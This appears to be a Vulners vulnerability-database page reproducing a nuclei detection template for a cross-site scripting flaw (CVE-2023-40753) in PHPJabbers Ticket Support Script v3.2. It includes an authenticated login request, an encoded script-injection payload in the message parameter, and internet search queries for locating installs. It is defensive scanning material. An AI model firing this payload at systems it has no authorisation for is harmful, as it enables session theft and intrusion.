Lucene search
K

PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting vulnerability in message parameter of index.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-40753
28 Aug 202313:15
attackerkb
Circl
CVE-2023-40753
28 Aug 202316:16
circl
CNNVD
Ticket Support Script 跨站脚本漏洞
28 Aug 202300:00
cnnvd
CVE
CVE-2023-40753
28 Aug 202300:00
cve
Cvelist
CVE-2023-40753
28 Aug 202300:00
cvelist
EUVD
EUVD-2023-45306
3 Oct 202520:07
euvd
NVD
CVE-2023-40753
28 Aug 202313:15
nvd
OSV
CVE-2023-40753
28 Aug 202313:15
osv
Prion
Cross site scripting
28 Aug 202313:15
prion
Positive Technologies
PT-2023-27618 · Phpjabbers · Phpjabbers Ticket Support Script
28 Aug 202300:00
ptsecurity
Rows per page
id: CVE-2023-40753

info:
  name: PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the message parameter in ticket notifications, potentially stealing support staff session cookies and accessing sensitive customer support tickets.
  remediation: |
    Update PHPJabbers Ticket Support Script to a version newer than 3.2 that properly sanitizes the message parameter and encodes output in notifications.
  reference:
    - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40753
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-40753
    cwe-id: CWE-79
    epss-score: 0.01053
    epss-percentile: 0.60204
    cpe: cpe:2.3:a:phpjabbers:ticket_support_script:3.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"PHPJabbers"
    fofa-query: body="PHPJabbers"
    vendor: phpjabbers
    product: ticket_support_script
  tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login_user=1&login_email={{username}}&login_password={{password}}&login_captcha=

      - |
        GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "</textarea><scrIpt>alert(document.domain);</scRipt><textarea>"
          - "Subject"
          - "Recipient users"
        condition: and

      - type: word
        part: content_type_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f3276c69c13ba7366fdb1cf000e18715679ea9c27cf872949babf97091e13968022067d417daa7e6f03e8d0bb897d9ead606c2b89bd4b86d776a7cfbfacad9fe98e7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.4
EPSS0.01053
SSVC
21